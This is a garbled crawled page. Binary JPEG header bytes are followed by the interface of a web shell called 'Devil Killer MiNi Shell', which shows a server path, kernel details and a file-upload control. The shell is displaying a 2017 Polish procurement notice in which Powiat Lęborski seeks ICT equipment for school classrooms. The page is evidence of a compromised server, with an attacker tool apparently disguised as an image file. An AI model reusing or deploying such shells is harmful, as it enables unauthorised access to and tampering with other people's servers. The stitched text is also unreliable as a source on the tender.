JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20170206/20574-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://powiatleborski.bip.gov.pl/' target='_blank'>http://powiatleborski.bip.gov.pl/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 20574 - 2017
              z dnia 2017-02-06 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Lębork: Dostawa sprzętu TIK oraz pozostałego wyposażenia pracowni szkolnych w ramach projektu OTWARTE UMYSŁY współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020 (Oś Priorytetowa III Edukacja, Działanie 3.2 Edukacja ogólna, Poddziałanie 3.2.1 Jakość edukacji ogólnej RPO WP 2014-2020).<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />OTWARTE UMYSŁY współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020 </div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiat Lęborski, krajowy numer identyfikacyjny
              770979648, ul.
              ul. Czołgistów 
              5,
              84-300  
              Lębork, woj.
              pomorskie, państwo
              Polska, tel.
              598 632 810, e-mail
              starostwo_lebork@poczta.onet.pl, faks
              598 632 850.
              <br />
              Adres strony internetowej (URL): http://www.powiat-lebork.com/<br /><br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                http://powiatleborski.bip.gov.pl/</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://powiatleborski.bip.gov.pl/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://powiatleborski.bip.gov.pl/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemny<br />
                Adres:
                <br />84-300 Lębork, Czołgistów 5</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa sprzętu TIK oraz pozostałego wyposażenia pracowni szkolnych w ramach projektu OTWARTE UMYSŁY współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020 (Oś Priorytetowa III Edukacja, Działanie 3.2 Edukacja ogólna, Poddziałanie 3.2.1 Jakość edukacji ogólnej RPO WP 2014-2020).<br /><b>Numer referencyjny: </b>PO.272.1.4.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />6<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dostawa sprzętu TIK oraz pozostałego wyposażenia pracowni szkolnych w ramach projektu OTWARTE UMYSŁY współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020 (Oś Priorytetowa III Edukacja, Działanie 3.2 Edukacja ogólna, Poddziałanie 3.2.1 Jakość edukacji ogólnej RPO WP 2014-2020).
Część 1 - Dostawa sprzętu TIK wizualizery, projektory multimedialne, urządzenia wielofunkcyjne, tablice multimedialne, routery, switche, aparaty i kamery cyfrowe
Część 2 - Dostawa sprzętu TIK  sprzęt sceniczny i nagłośnieniowy
Część 3 - Dostawa sprzętu TIK  oprogramowanie komputerowe i przedmiotowe
Część 4  Dostawa sprzętu TIK i wyposażenia pracowni szkolnych w narzędzia do nauczania przedmiotów przyrodniczych  biologia, chemia
Część 5  Dostawa sprzętu TIK i wyposażenia pracowni szkolnych w narzędzia do nauczania przedmiotów przyrodniczych  geografia, fizyka oraz pracowni matematycznych
Część 6  Dostawa sprzętu TIK oraz innych niezbędnych materiałów i pomocy dydaktycznych<br /><br /><b>II.5) Główny kod CPV: </b>32322000-6<br /><b> Dodatkowe kody CPV:</b>38652100-1,
                30232000-4,
                30230000-0,
                38650000-6,
                38651000-3,
                38651600-9,
                37300000-1,
                32340000-8,
                48000000-8,
                32351000-8,
                38000000-5,
                38400000-9,
                38100000-6,
                39162000-5,
                24000000-4<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 14<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                nie podlegają wykluczeniu w okolicznościach, o których mowa w art. 24 ust. 1 i 5 Pzp <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                nie podlegają wykluczeniu w okolicznościach, o których mowa w art. 24 ust. 1 i 5 Pzp <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu na podstawie art. 24 ust. 1 i 5 ustawy PZP - zał nr 4 do SIWZ</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 b<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">6.1	W celu potwierdzenia spełniania warunków udziału w postępowaniu zamawiający żąda od wykonawcy:
a)	Oświadczenie wykonawcy o spełnianiu  warunków udziału w postępowaniu, o których mowa w art.22 ust.1b . Wzór oświadczenia stanowi Załącznik nr 4a do SIWZ.
6.2	 W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu zamawiający żąda następujących dokumentów:
a)	Aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu na podstawie art.24 ust.1 i 5 ustawy Pzp  Załącznik nr 4 
6.3	Oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu Zgodnie z art. 24 ust. 11 Pzp wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji dotyczących kwoty, jaką zamierza przeznaczyć na sfinansowanie zamówienia, firm oraz adresów wykonawców, którzy złożyli oferty w terminie, ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych w ofertach, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Pzp. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Wzór oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Pzp stanowi Załącznik nr 3. do SIWZ.
6.4	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 6.2. SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed  terminem składania ofert.
6.5	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt 6.4. SIWZ, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. 
6.6	W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.
6.7	Zgodnie z art. 24 ust. 8 Pzp wykonawca, który podlega wykluczeniu na podstawie art. 24 ust. 1 pkt 13 i 14 oraz 16-20 lub ust. 5 Pzp, może przedstawić dowody na to, że podjęte przez niego środki są wystarczające do wykazania jego rzetelności, w szczególności udowodnić naprawienie szkody wyrządzonej przestępstwem lub przestępstwem skarbowym, zadośćuczynienie pieniężne za doznaną krzywdę lub naprawienie szkody, wyczerpujące wyjaśnienie stanu faktycznego oraz współpracę z organami ścigania oraz podjęcie konkretnych środków technicznych, organizacyjnych i kadrowych, które są odpowiednie dla zapobiegania dalszym przestępstwom lub przestępstwom skarbowym lub nieprawidłowemu postępowaniu wykonawcy. Przepisu zdania pierwszego nie stosuje się, jeżeli wobec wykonawcy, będącego podmiotem zbiorowym, orzeczono prawomocnym wyrokiem sądu zakaz ubiegania się o udzielenie zamówienia oraz nie upłynął określony w tym wyroku okres obowiązywania tego zakazu. 
6.8	Wykonawca nie podlega wykluczeniu, jeżeli zamawiający, uwzględniając wagę i szczególne okoliczności czynu wykonawcy, uzna za wystarczające dowody przedstawione na podstawie art. 24 ust. 8 Pzp.</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
